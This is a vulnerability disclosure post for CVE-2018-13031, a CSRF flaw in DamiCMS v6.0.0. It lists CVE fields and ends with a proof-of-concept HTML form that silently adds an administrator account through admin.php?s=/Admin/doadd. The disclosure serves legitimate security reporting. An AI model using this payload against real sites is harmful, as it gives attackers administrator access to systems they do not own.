CVE-2018-13031:DAMICMS_V6.0.0_CSRF

> ------------------------------------------

> CVE-2018-13031
> [Discoverer]
> Bay0net from JZXTSEC

> ------------------------------------------

> [Suggested description]
> DamiCMS v6.0.0 allows CSRF via admin.php?s=/Admin/doadd to add an administrator account.

> ------------------------------------------

> [Additional Information]
> A CSRF vulnerability exists in DAMICMS_V6.0.0: The administrator can be added arbitrarily.

> ------------------------------------------

> [Vulnerability Type]
> Cross Site Request Forgery (CSRF)

> ------------------------------------------

> [Vendor of Product]
https://www.damicms.com/Down#

> ------------------------------------------

> [Affected Product Code Base]
> damicms - v6.0.0

> ------------------------------------------

> [Affected Component]
> Damicms_v6.0.0 allows CSRF via admin.php?s=/Admin/doadd to add an administrator accounts.

> ------------------------------------------

> [Attack Type]
> Remote

> ------------------------------------------

> [Impact Code execution]
> true

> ------------------------------------------

> [Impact Escalation of Privileges]
> true

> ------------------------------------------

> [Attack Vectors]
https://www.cnblogs.com/v1vvwv/p/9248562.html

> ------------------------------------------

> [Reference]
https://www.cnblogs.com/v1vvwv/p/9248562.html

> ------------------------------------------

A CSRF vulnerability exists in DAMICMS_V6.0.0: The administrator can be added arbitrarily.

 payload

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/dami/admin.php?s=/Admin/doadd" method="POST">
      <input type="hidden" name="username" value="test22" />
      <input type="hidden" name="password" value="test22" />
      <input type="hidden" name="role_id" value="1" />
      <input type="hidden" name="Submit" value="添加" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

 

References:

https://www.damicms.com/Down#

posted @ 2018-06-30 20:30 Bay0net 阅读(...) 评论(...) 编辑 收藏